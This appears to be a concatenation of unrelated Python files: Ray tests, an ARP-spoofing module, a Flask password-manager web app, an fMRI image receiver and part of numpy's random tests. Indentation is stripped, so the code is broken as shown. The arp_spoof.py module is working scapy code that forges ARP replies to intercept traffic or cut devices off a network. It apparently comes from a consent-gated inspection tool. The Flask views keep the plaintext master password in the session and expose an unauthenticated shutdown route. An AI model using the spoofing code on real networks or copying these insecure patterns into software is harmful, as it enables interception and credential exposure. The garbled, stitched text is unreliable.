file_prefix = "test_object_id_properties"
# Make sure the ids are fork safe.
def write(index):
str = ray.ObjectID.from_random().hex()
with open("{}{}".format(file_prefix, index), "w") as fo:
fo.write(str)
def read(index):
with open("{}{}".format(file_prefix, index), "r") as fi:
for line in fi:
return line
processes = [Process(target=write, args=(_, )) for _ in range(4)]
for process in processes:
process.start()
for process in processes:
process.join()
hexes = {read(i) for i in range(4)}
[os.remove("{}{}".format(file_prefix, i)) for i in range(4)]
assert len(hexes) == 4
@pytest.fixture
def shutdown_only_with_initialization_check():
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
assert not ray.is_initialized()
def test_initialized(shutdown_only_with_initialization_check):
assert not ray.is_initialized()
ray.init(num_cpus=0)
assert ray.is_initialized()
def test_initialized_local_mode(shutdown_only_with_initialization_check):
assert not ray.is_initialized()
ray.init(num_cpus=0, local_mode=True)
assert ray.is_initialized()
def test_wait_reconstruction(shutdown_only):
ray.init(num_cpus=1, object_store_memory=int(10**8))
@ray.remote
def f():
return np.zeros(6 * 10**7, dtype=np.uint8)
x_id = f.remote()
ray.wait([x_id])
ray.wait([f.remote()])
assert not ray.worker.global_worker.core_worker.object_exists(x_id)
ready_ids, _ = ray.wait([x_id])
assert len(ready_ids) == 1
def test_ray_setproctitle(ray_start_2_cpus):
@ray.remote
class UniqueName(object):
def __init__(self):
assert setproctitle.getproctitle() == "ray_UniqueName:__init__()"
def f(self):
assert setproctitle.getproctitle() == "ray_UniqueName:f()"
@ray.remote
def unique_1():
assert setproctitle.getproctitle(
) == "ray_worker:ray.tests.test_basic.unique_1()"
actor = UniqueName.remote()
ray.get(actor.f.remote())
ray.get(unique_1.remote())
def test_duplicate_error_messages(shutdown_only):
ray.init(num_cpus=0)
driver_id = ray.WorkerID.nil()
error_data = ray.gcs_utils.construct_error_message(driver_id, "test",
"message", 0)
# Push the same message to the GCS twice (they are the same because we
# do not include a timestamp).
r = ray.worker.global_worker.redis_client
r.execute_command("RAY.TABLE_APPEND",
ray.gcs_utils.TablePrefix.Value("ERROR_INFO"),
ray.gcs_utils.TablePubsub.Value("ERROR_INFO_PUBSUB"),
driver_id.binary(), error_data)
# Before https://github.com/ray-project/ray/pull/3316 this would
# give an error
r.execute_command("RAY.TABLE_APPEND",
ray.gcs_utils.TablePrefix.Value("ERROR_INFO"),
ray.gcs_utils.TablePubsub.Value("ERROR_INFO_PUBSUB"),
driver_id.binary(), error_data)
@pytest.mark.skipif(
os.getenv("TRAVIS") is None,
reason="This test should only be run on Travis.")
def test_ray_stack(ray_start_2_cpus):
def unique_name_1():
time.sleep(1000)
@ray.remote
def unique_name_2():
time.sleep(1000)
@ray.remote
def unique_name_3():
unique_name_1()
unique_name_2.remote()
unique_name_3.remote()
success = False
start_time = time.time()
while time.time() - start_time < 30:
# Attempt to parse the "ray stack" call.
output = ray.utils.decode(subprocess.check_output(["ray", "stack"]))
if ("unique_name_1" in output and "unique_name_2" in output
and "unique_name_3" in output):
success = True
break
if not success:
raise Exception("Failed to find necessary information with "
"'ray stack'")
def test_pandas_parquet_serialization():
# Only test this if pandas is installed
pytest.importorskip("pandas")
import pandas as pd
import pyarrow as pa
import pyarrow.parquet as pq
tempdir = tempfile.mkdtemp()
filename = os.path.join(tempdir, "parquet-test")
pd.DataFrame({"col1": [0, 1], "col2": [0, 1]}).to_parquet(filename)
with open(os.path.join(tempdir, "parquet-compression"), "wb") as f:
table = pa.Table.from_arrays([pa.array([1, 2, 3])], ["hello"])
pq.write_table(table, f, compression="lz4")
# Clean up
shutil.rmtree(tempdir)
def test_socket_dir_not_existing(shutdown_only):
random_name = ray.ObjectID.from_random().hex()
temp_raylet_socket_dir = "/tmp/ray/tests/{}".format(random_name)
temp_raylet_socket_name = os.path.join(temp_raylet_socket_dir,
"raylet_socket")
ray.init(num_cpus=1, raylet_socket_name=temp_raylet_socket_name)
def test_raylet_is_robust_to_random_messages(ray_start_regular):
node_manager_address = None
node_manager_port = None
for client in ray.nodes():
if "NodeManagerAddress" in client:
node_manager_address = client["NodeManagerAddress"]
node_manager_port = client["NodeManagerPort"]
assert node_manager_address
assert node_manager_port
# Try to bring down the node manager:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((node_manager_address, node_manager_port))
s.send(1000 * b"asdf")
@ray.remote
def f():
return 1
assert ray.get(f.remote()) == 1
def test_non_ascii_comment(ray_start_regular):
@ray.remote
def f():
# 日本語 Japanese comment
return 1
assert ray.get(f.remote()) == 1
@ray.remote
def echo(x):
return x
@ray.remote
class WithConstructor(object):
def __init__(self, data):
self.data = data
def get_data(self):
return self.data
@ray.remote
class WithoutConstructor(object):
def set_data(self, data):
self.data = data
def get_data(self):
return self.data
class BaseClass(object):
def __init__(self, data):
self.data = data
def get_data(self):
return self.data
@ray.remote
class DerivedClass(BaseClass):
def __init__(self, data):
# Due to different behaviors of super in Python 2 and Python 3,
# we use BaseClass directly here.
BaseClass.__init__(self, data)
def test_load_code_from_local(shutdown_only):
ray.init(load_code_from_local=True, num_cpus=4)
message = "foo"
# Test normal function.
assert ray.get(echo.remote(message)) == message
# Test actor class with constructor.
actor = WithConstructor.remote(1)
assert ray.get(actor.get_data.remote()) == 1
# Test actor class without constructor.
actor = WithoutConstructor.remote()
actor.set_data.remote(1)
assert ray.get(actor.get_data.remote()) == 1
# Test derived actor class.
actor = DerivedClass.remote(1)
assert ray.get(actor.get_data.remote()) == 1
# Test using ray.remote decorator on raw classes.
base_actor_class = ray.remote(num_cpus=1)(BaseClass)
base_actor = base_actor_class.remote(message)
assert ray.get(base_actor.get_data.remote()) == message
def test_shutdown_disconnect_global_state():
ray.init(num_cpus=0)
ray.shutdown()
with pytest.raises(Exception) as e:
ray.objects()
assert str(e.value).endswith("ray.init has been called.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [150 * 1024 * 1024], indirect=True)
def test_put_pins_object(ray_start_object_store_memory):
x_id = ray.put("HI")
x_copy = ray.ObjectID(x_id.binary())
assert ray.get(x_copy) == "HI"
# x cannot be evicted since x_id pins it
for _ in range(10):
ray.put(np.zeros(10 * 1024 * 1024))
assert ray.get(x_id) == "HI"
assert ray.get(x_copy) == "HI"
# now it can be evicted since x_id pins it but x_copy does not
del x_id
for _ in range(10):
ray.put(np.zeros(10 * 1024 * 1024))
with pytest.raises(ray.exceptions.UnreconstructableError):
ray.get(x_copy)
# weakref put
y_id = ray.put("HI", weakref=True)
for _ in range(10):
ray.put(np.zeros(10 * 1024 * 1024))
with pytest.raises(ray.exceptions.UnreconstructableError):
ray.get(y_id)
@ray.remote
def check_no_buffer_ref(x):
assert x[0].get_buffer_ref() is None
z_id = ray.put("HI")
assert z_id.get_buffer_ref() is not None
ray.get(check_no_buffer_ref.remote([z_id]))
@pytest.mark.parametrize(
"ray_start_object_store_memory", [150 * 1024 * 1024], indirect=True)
def test_redis_lru_with_set(ray_start_object_store_memory):
x = np.zeros(8 * 10**7, dtype=np.uint8)
x_id = ray.put(x, weakref=True)
# Remove the object from the object table to simulate Redis LRU eviction.
removed = False
start_time = time.time()
while time.time() < start_time + 10:
if ray.state.state.redis_clients[0].delete(b"OBJECT" +
x_id.binary()) == 1:
removed = True
break
assert removed
# Now evict the object from the object store.
ray.put(x) # This should not crash.
def test_decorated_function(ray_start_regular):
def function_invocation_decorator(f):
def new_f(args, kwargs):
# Reverse the arguments.
return f(args[::-1], {"d": 5}), kwargs
return new_f
def f(a, b, c, d=None):
return a, b, c, d
f.__ray_invocation_decorator__ = function_invocation_decorator
f = ray.remote(f)
result_id, kwargs = f.remote(1, 2, 3, d=4)
assert kwargs == {"d": 4}
assert ray.get(result_id) == (3, 2, 1, 5)
def test_get_postprocess(ray_start_regular):
def get_postprocessor(object_ids, values):
return [value for value in values if value > 0]
ray.worker.global_worker._post_get_hooks.append(get_postprocessor)
assert ray.get(
[ray.put(i) for i in [0, 1, 3, 5, -1, -3, 4]]) == [1, 3, 5, 4]
def test_export_after_shutdown(ray_start_regular):
# This test checks that we can use actor and remote function definitions
# across multiple Ray sessions.
@ray.remote
def f():
pass
@ray.remote
class Actor(object):
def method(self):
pass
ray.get(f.remote())
a = Actor.remote()
ray.get(a.method.remote())
ray.shutdown()
# Start Ray and use the remote function and actor again.
ray.init(num_cpus=1)
ray.get(f.remote())
a = Actor.remote()
ray.get(a.method.remote())
ray.shutdown()
# Start Ray again and make sure that these definitions can be exported from
# workers.
ray.init(num_cpus=2)
@ray.remote
def export_definitions_from_worker(remote_function, actor_class):
ray.get(remote_function.remote())
actor_handle = actor_class.remote()
ray.get(actor_handle.method.remote())
ray.get(export_definitions_from_worker.remote(f, Actor))
def test_invalid_unicode_in_worker_log(shutdown_only):
info = ray.init(num_cpus=1)
logs_dir = os.path.join(info["session_dir"], "logs")
# Wait till first worker log file is created.
while True:
log_file_paths = glob.glob("{}/worker*.out".format(logs_dir))
if len(log_file_paths) == 0:
time.sleep(0.2)
else:
break
with open(log_file_paths[0], "wb") as f:
f.write(b"\xe5abc\nline2\nline3\n")
f.write(b"\xe5abc\nline2\nline3\n")
f.write(b"\xe5abc\nline2\nline3\n")
f.flush()
# Wait till the log monitor reads the file.
time.sleep(1.0)
# Make sure that nothing has died.
assert ray.services.remaining_processes_alive()
@pytest.mark.skip(reason="This test is too expensive to run.")
def test_move_log_files_to_old(shutdown_only):
info = ray.init(num_cpus=1)
logs_dir = os.path.join(info["session_dir"], "logs")
@ray.remote
class Actor(object):
def f(self):
print("function f finished")
# First create a temporary actor.
actors = [
Actor.remote() for i in range(ray_constants.LOG_MONITOR_MAX_OPEN_FILES)
]
ray.get([a.f.remote() for a in actors])
# Make sure no log files are in the "old" directory before the actors
# are killed.
assert len(glob.glob("{}/old/worker*.out".format(logs_dir))) == 0
# Now kill the actors so the files get moved to logs/old/.
[a.__ray_terminate__.remote() for a in actors]
while True:
log_file_paths = glob.glob("{}/old/worker*.out".format(logs_dir))
if len(log_file_paths) > 0:
with open(log_file_paths[0], "r") as f:
assert "function f finished\n" in f.readlines()
break
# Make sure that nothing has died.
assert ray.services.remaining_processes_alive()
|
arp_spoof.py
|
"""
Based on ARP packets received, sends out spoofed ARP packets.
"""
from host_state import HostState
import scapy.all as sc
import threading
import utils
import time
# Min seconds between successive spoofed packets
MIN_ARP_SPOOF_INTERVAL = 0.01
# If we want to block a device, we should use the follow corrupt mac address as the source.
CORRUPT_MAC_ADDRESS = '00:11:22:33:44:55'
class ArpSpoof(object):
def __init__(self, host_state):
assert isinstance(host_state, HostState)
self._host_state = host_state
self._lock = threading.Lock()
self._active = True
self._thread = threading.Thread(target=self._arp_spoof_loop)
self._thread.daemon = True
def start(self):
with self._lock:
self._active = True
utils.log('[Arp Spoof] Starting.')
self._thread.start()
def _arp_spoof_loop(self):
prev_ip_mac_dict = None
while True:
if not self._host_state.is_inspecting():
time.sleep(2)
continue
time.sleep(1)
with self._lock:
if not self._active:
return
with self._host_state.lock:
if not self._host_state.has_consent:
utils.log('[ARP Spoof] No consent; no spoofing.')
continue
# Get ARP cache
ip_mac_dict = self._host_state.get_ip_mac_dict_copy()
gateway_ip = self._host_state.gateway_ip
if str(ip_mac_dict) != str(prev_ip_mac_dict):
prev_ip_mac_dict = ip_mac_dict
utils.log('[ARP Spoof] Cache:', ip_mac_dict)
utils.log(
'[ARP Spoof] Whitelist:', self._host_state.device_whitelist
)
# Get gateway MAC addr
try:
gateway_mac = ip_mac_dict[gateway_ip]
except KeyError:
continue
whitelist_ip_mac = []
# Add gateway
whitelist_ip_mac.append((gateway_ip, gateway_mac))
# Build device-to-device whitelist
for ip, mac in ip_mac_dict.items():
device_id = utils.get_device_id(mac, self._host_state)
if device_id not in self._host_state.device_whitelist:
utils.log('[ARP Spoof] Ignore:', ip, mac)
continue
whitelist_ip_mac.append((ip, mac))
# Spoof individual devices on the network.
for (victim_ip, victim_mac) in ip_mac_dict.items():
if victim_ip == gateway_ip:
continue
# Check against whitelist.
victim_device_id = \
utils.get_device_id(victim_mac, self._host_state)
if victim_device_id not in self._host_state.device_whitelist:
utils.log('[ARP Spoof] Ignore:', victim_ip, victim_mac)
continue
if utils.TEST_OUI_LIST:
victim_mac_oui = utils.get_oui(victim_mac)
if victim_mac_oui not in utils.TEST_OUI_LIST:
continue
utils.safe_run(
self._arp_spoof,
args=(victim_device_id, victim_mac, victim_ip, whitelist_ip_mac)
)
with self._lock:
if not self._active:
return
time.sleep(max(MIN_ARP_SPOOF_INTERVAL, 2.0 / len(ip_mac_dict)))
def _arp_spoof(self, victim_device_id, victim_mac, victim_ip, whitelist_ip_mac):
"""Sends out spoofed packets for a single target."""
# Check if we want to block this device now
block_device = False
try:
with self._host_state.lock:
(block_start_ts, block_stop_ts) = self._host_state.block_device_dict[victim_device_id]
if block_start_ts <= time.time() <= block_stop_ts:
block_device = True
except KeyError:
pass
with self._host_state.lock:
spoof_arp = self._host_state.spoof_arp
for dest_ip, dest_mac in whitelist_ip_mac:
if victim_ip == dest_ip:
continue
dest_arp = sc.ARP()
dest_arp.op = 2
dest_arp.psrc = victim_ip
dest_arp.hwdst = dest_mac
dest_arp.pdst = dest_ip
if not spoof_arp:
dest_arp.hwsrc = victim_mac
utils.log('[Arp Spoof] Restoring', victim_ip, '->', dest_ip)
victim_arp = sc.ARP()
victim_arp.op = 2
victim_arp.psrc = dest_ip
victim_arp.hwdst = victim_mac
victim_arp.pdst = victim_ip
if not spoof_arp:
victim_arp.hwsrc = dest_mac
utils.log('[Arp Spoof] Restoring', dest_ip, '->', victim_ip)
if block_device:
dest_arp.hwsrc = CORRUPT_MAC_ADDRESS
victim_arp.hwsrc = CORRUPT_MAC_ADDRESS
sc.send(victim_arp, verbose=0)
sc.send(dest_arp, verbose=0)
def stop(self):
utils.log('[Arp Spoof] Stopping.')
with self._lock:
self._active = False
self._thread.join()
utils.log('[Arp Spoof] Stopped.')
|
views.py
|
from binascii import hexlify, unhexlify
from passlib.hash import pbkdf2_sha256
from threading import Thread
from time import sleep
import os
from flask_login import login_user, login_required
from flask import (
render_template, request,
redirect, url_for, json,
jsonify, make_response, session
)
from app import application, db, login_manager
from models import User, Passwords
from pm import PasswordManager
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
def CloseApp():
#Closes Application
sleep(0.5)
os._exit(1)
return(0)
#Displays the index page containing options for
#New User, Login, and Shutdown
@application.route('/', methods = ['POST', 'GET'])
def Index():
if request.method == 'POST':
if request.form['login'] == 'New User':
return(redirect(url_for('SignUp')))
elif request.form['login'] == 'Login':
return(redirect(url_for('Login')))
elif request.form['login'] == 'Shutdown':
return(redirect(url_for('Shutdown')))
elif request.method == 'GET':
return(render_template('index.html'))
#Displays the login page
@application.route('/login', methods = ['POST', 'GET'])
def Login():
try:
if request.method == 'GET':
return(render_template('login.html'))
elif request.method == 'POST':
username = request.form['Username']
password = request.form['Password']
db_user = User.query.filter_by(username=username).first()
if db_user.username == username and pbkdf2_sha256.verify(password, db_user.password):
login_user(db_user)
salt = db_user.salt
salt = salt.encode()
pass_manager = PasswordManager(password, salt)
session['key'] = password
session['salt'] = salt
resp = make_response(redirect(url_for('Main')))
return(resp)
else:
return(render_template('login.html'))
except Exception as e:
error = str(e)
return render_template('error.html', error=error)
#Displays the main page containnig options for
#New Password, View Passwords, Update Password
#Delete Password, and Logout
@application.route('/main', methods = ['POST', 'GET'])
@login_required
def Main():
try:
if request.method == 'POST':
#redirect to another function using button value
return(redirect(url_for(request.form['pass'])))
elif request.method == 'GET':
return(render_template('main.html'))
except Exception as e:
error = str(e)
return render_template('error.html', error=error)
#Displays the newpassword page
@application.route('/newpassword', methods = ['POST', 'GET'])
@login_required
def newPassword():
if request.method == 'POST':
account = request.form['account'] #account name
size = request.form['size'] #requested password size
pass_manager = PasswordManager(session['key'], session['salt'])
pass_manager.addPassword(account=account, size=size)#create new password
return(redirect(url_for('Main')))
elif request.method == 'GET':
return(render_template('newpassword.html'))
#Will display add page
@application.route('/add', methods = ['POST', 'GET'])
@login_required
def addPassword():
if request.method == 'GET':
return(render_template('addpassword.html'))
elif request.method == 'POST':
account = request.form['Account']
password = request.form['Password']
confirm_password = request.form['Confirm Password']
if confirm_password != password:
return(redirect(url_for('AddPassword')))
else:
pass_manager = PasswordManager(session['key'], session['salt'])
pass_manager.addPassword(account, password)
return(redirect(url_for('Main')))
return(0)
#Displays the delete page
@application.route('/delete', methods = ['POST', 'GET'])
@login_required
def deletePassword():
pass_manager = PasswordManager(session['key'], session['salt'])
data = pass_manager.getPasswords()
if request.method == 'POST':
account = request.form['account']
pass_manager.deletePassword(account)
return(redirect(url_for('Main')))
elif request.method == 'GET':
return(render_template('delete.html', data=data))
#Displays the password page
@application.route('/passwords', methods = ['POST', 'GET'])
@login_required
def displayPasswords():
if request.method == 'POST':
if request.form['pass'] == "Logout":
return(redirect(url_for('logout')))
elif request.method == 'GET':
pass_manager = PasswordManager(session['key'], session['salt'])
data = pass_manager.getPasswords()
return render_template('passwords.html', data=data)
#Displays the sign up page for new users
@application.route('/signup', methods = ['POST', 'GET'])
def SignUp():
try:
if request.method == 'GET':
return(render_template('signup.html'))
elif request.method == 'POST':
username = request.form['Username']
password = request.form['Password']
confirm_password = request.form['Confirm_Password']
if confirm_password != password:
return(redirect(url_for('SignUp')))
else:
password = pbkdf2_sha256.hash(password)
salt = os.urandom(16)
salt = hexlify(salt).decode()
user = User(username=username, password=password, salt=salt)
db.session.add(user)
db.session.commit()
return(redirect(url_for('Login')))
except Exception as e:
error = str(e)
return render_template('error.html', error=error)
return(0)
#Displays the shutdown page and closes the app
@application.route('/shutdown')
def Shutdown():
resp = make_response(render_template('shutdown.html'))
#creates new thread for CloseApp function
t = Thread(target=CloseApp)
t.daemon = True
t.start()
#returns shutdown template
return(resp)
#Displays the logout page and closes the app
@application.route('/logout')
@login_required
def logout():
#removes users cookies
resp = make_response(render_template('logout.html'))
t = Thread(target=CloseApp)
t.daemon = True
t.start()
return(resp)
|
receive_nii.py
|
#!/usr/bin/env python
import argparse
from collections import namedtuple
import os
import socket
import sys
from time import sleep
import threading
import SocketServer
import external_image
import nibabel as nb
import numpy as np
SocketServer.TCPServer.allow_reuse_address = True
class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):
def __init__(self, callback, infoclient, *args, **keys):
self.callback = callback
self.infoclient = infoclient
SocketServer.BaseRequestHandler.__init__(self, *args, **keys)
def handle(self):
self.callback(self.infoclient, self.request)
'''
cur_thread = threading.current_thread()
response = "{}: {}".format(cur_thread.name, data)
self.request.sendall(response)
'''
def handler_factory(callback, infoclient):
def createHandler(*args, **keys):
return ThreadedTCPRequestHandler(callback, infoclient, *args, **keys)
return createHandler
def process_data_callback(infoclient, sock):
infoclient.process_data(sock)
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
class ImageReceiver(object):
def __init__(self, args):
self.host = args.host
self.port = args.port
self._is_running = None
self._server = None
self.imagestore = []
self.save_location = args.save_directory
self.current_uid = None
self.current_series_hdr = None
self.save_4d = args.four_dimensional
self.stop_after_one_series = args.single_series
self.ei = external_image.ExternalImage("ExternalImageHeader")
def stop(self):
self._server.shutdown()
self._is_running = None
self._server = None
if self.save_4d:
self.save_imagestore()
print "image receiver stopped"
def start(self):
self._startserver()
def check(self):
if not self._is_running:
raise RuntimeError('Server is not running')
return self.imagestore
def _startserver(self):
if self._is_running:
raise RuntimeError('Server already running')
server = ThreadedTCPServer((self.host, self.port),
handler_factory(process_data_callback, self))
ip, port = server.server_address
print "image receiver running at %s on port %d" % (ip, port)
# Start a thread with the server -- that thread will then start one
# more thread for each request
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
self._is_running = True
self._server = server
def process_data(self, sock):
in_bytes = sock.recv(self.ei.get_header_size())
if len(in_bytes) != self.ei.get_header_size():
raise ValueError(
"Header data wrong size: expected %d bytes, got %d" %
(self.ei.get_header_size(), len(in_bytes))
)
print "processing %d header data bytes" % len(in_bytes)
hdr = self.ei.process_header(in_bytes)
# validation
if self.current_uid != hdr.seriesUID:
assert hdr.currentTR == 1
self.current_uid = hdr.seriesUID
self.current_series_hdr = hdr
img_data = ""
while len(img_data) < self.ei.get_image_size():
in_bytes = sock.recv(4096)
img_data += in_bytes
if len(img_data) != self.ei.get_image_size():
raise ValueError(
"Image data wrong size: expected %d bytes, got %d" %
(self.ei.get_image_size(), len(img_data))
)
print "processing %d image data bytes" % len(img_data)
new_ei = self.ei.process_image(img_data)
if new_ei:
if (isinstance(new_ei, nb.Nifti1Image) and
new_ei not in self.imagestore):
self.imagestore.append(new_ei)
if not self.save_4d:
self.save_nifti(new_ei)
if hdr.currentTR + 1 == hdr.totalTR:
if self.save_4d:
self.save_imagestore()
self.imagestore = []
if self.stop_after_one_series:
self.stop()
else:
self.stop()
def save_nifti(self, img):
if len(img.get_shape()) == 3 or img.get_shape()[3] == 1:
index = len(self.imagestore) - 1
filename = os.path.join(
self.save_location,
'img-%s-%05d.nii.gz' % (self.current_uid, index))
else:
filename = os.path.join(self.save_location,
'img-%s.nii.gz' % self.current_uid)
img.to_filename(filename)
print "Saved to %s" % filename
def save_imagestore(self):
if len(self.imagestore) == 0:
return
base_shape = self.imagestore[0].get_shape()
new_shape = (base_shape[0], base_shape[1], base_shape[2],
len(self.imagestore))
new_data = np.zeros(new_shape)
for i in xrange(new_shape[3]):
assert self.imagestore[i].get_shape() == \
self.imagestore[0].get_shape()
new_data[:,:,:,i] = self.imagestore[i].get_data()
new_img = nb.Nifti1Image(new_data, self.imagestore[0].get_affine())
new_img.get_header().set_zooms((
self.current_series_hdr.pixelSpacingReadMM,
self.current_series_hdr.pixelSpacingPhaseMM,
self.current_series_hdr.pixelSpacingSliceMM,
self.current_series_hdr.repetitionTimeMS +
self.current_series_hdr.repetitionDelayMS))
self.save_nifti(new_img)
def parse_args(args):
parser = argparse.ArgumentParser()
parser.add_argument("-H", "--host", default="localhost",
help="Name of the host to run the image receiver on.")
parser.add_argument("-p", "--port", type=int, default="15000",
help="Port to run the image receiver on.")
parser.add_argument("-d", "--save_directory", default=".",
help="Directory to save images to.")
parser.add_argument("-f", "--four_dimensional", action="store_true",
help="Store each image series as a single 4D file.")
parser.add_argument("-s", "--single_series", action="store_true",
help="Shut down the receiver after one entire series "
"has been read.")
return parser.parse_args()
def main(argv):
args = parse_args(argv)
receiver = ImageReceiver(args)
receiver.start()
while(receiver._is_running):
sleep(1)
if __name__ == "__main__":
sys.exit(main(sys.argv))
|
test_random.py
|
from __future__ import division, absolute_import, print_function
import warnings
import numpy as np
from numpy.testing import (
run_module_suite, assert_, assert_raises, assert_equal, assert_warns,
assert_no_warnings, assert_array_equal, assert_array_almost_equal,
suppress_warnings
)
from numpy import random
import sys
import warnings
class TestSeed(object):
def test_scalar(self):
s = np.random.RandomState(0)
assert_equal(s.randint(1000), 684)
s = np.random.RandomState(4294967295)
assert_equal(s.randint(1000), 419)
def test_array(self):
s = np.random.RandomState(range(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState(np.arange(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState([0])
assert_equal(s.randint(1000), 973)
s = np.random.RandomState([4294967295])
assert_equal(s.randint(1000), 265)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, -0.5)
assert_raises(ValueError, np.random.RandomState, -1)
def test_invalid_array(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, [-0.5])
assert_raises(ValueError, np.random.RandomState, [-1])
assert_raises(ValueError, np.random.RandomState, [4294967296])
assert_raises(ValueError, np.random.RandomState, [1, 2, 4294967296])
assert_raises(ValueError, np.random.RandomState, [1, -2, 4294967296])
def test_invalid_array_shape(self):
# gh-9832
assert_raises(ValueError, np.random.RandomState, np.array([], dtype=np.int64))
assert_raises(ValueError, np.random.RandomState, [[1, 2, 3]])
assert_raises(ValueError, np.random.RandomState, [[1, 2, 3],
[4, 5, 6]])
class TestBinomial(object):
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(random.binomial(0, p) == 0)
assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial(object):
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.randint(-5, -1) < -1)
x = random.randint(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, np.random.multinomial, 1, p,
float(1))
class TestSetState(object):
def setup(self):
self.seed = 1234567890
self.prng = random.RandomState(self.seed)
self.state = self.prng.get_state()
def test_basic(self):
old = self.prng.tomaxint(16)
self.prng.set_state(self.state)
new = self.prng.tomaxint(16)
assert_(np.all(old == new))
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.prng.standard_normal(size=3)
self.prng.set_state(self.state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.prng.standard_normal()
state = self.prng.get_state()
old = self.prng.standard_normal(size=3)
self.prng.set_state(state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_backwards_compatibility(self):
# Make sure we can accept old state tuples that do not have the
# cached Gaussian value.
old_state = self.state[:-2]
x1 = self.prng.standard_normal(size=16)
self.prng.set_state(old_state)
x2 = self.prng.standard_normal(size=16)
self.prng.set_state(self.state)
x3 = self.prng.standard_normal(size=16)
assert_(np.all(x1 == x2))
assert_(np.all(x1 == x3))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.prng.negative_binomial(0.5, 0.5)
class TestRandint(object):
rfunc = np.random.randint
# valid integer/boolean types
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self):
assert_raises(TypeError, self.rfunc, 1, dtype=float)
def test_bounds_checking(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, dtype=dt)
def test_rng_zero_and_extremes(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = (lbnd + ubnd)//2
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
def test_full_range(self):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
try:
self.rfunc(lbnd, ubnd, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_in_bounds_fuzz(self):
# Don't use fixed seed
np.random.seed()
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd, size=2**16, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2, size=2**16, dtype=np.bool_)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_repeatability(self):
import hashlib
# We use a md5 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {'bool': '7dd3170d7aa461d201a65f8bcf3944b0',
'int16': '1b7741b80964bb190c50d541dca1cac1',
'int32': '4dc9fcc2b395577ebb51793e58ed1a05',
'int64': '17db902806f448331b5a758d7d2ee672',
'int8': '27dd30c4e08a797063dffac2490b0be6',
'uint16': '1b7741b80964bb190c50d541dca1cac1',
'uint32': '4dc9fcc2b395577ebb51793e58ed1a05',
'uint64': '17db902806f448331b5a758d7d2ee672',
'uint8': '27dd30c4e08a797063dffac2490b0be6'}
for dt in self.itype[1:]:
np.random.seed(1234)
# view as little endian for hash
if sys.byteorder == 'little':
val = self.rfunc(0, 6, size=1000, dtype=dt)
else:
val = self.rfunc(0, 6, size=1000, dtype=dt).byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianess
np.random.seed(1234)
val = self.rfunc(0, 2, size=1000, dtype=bool).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(bool).name] == res)
def test_int64_uint64_corner_case(self):
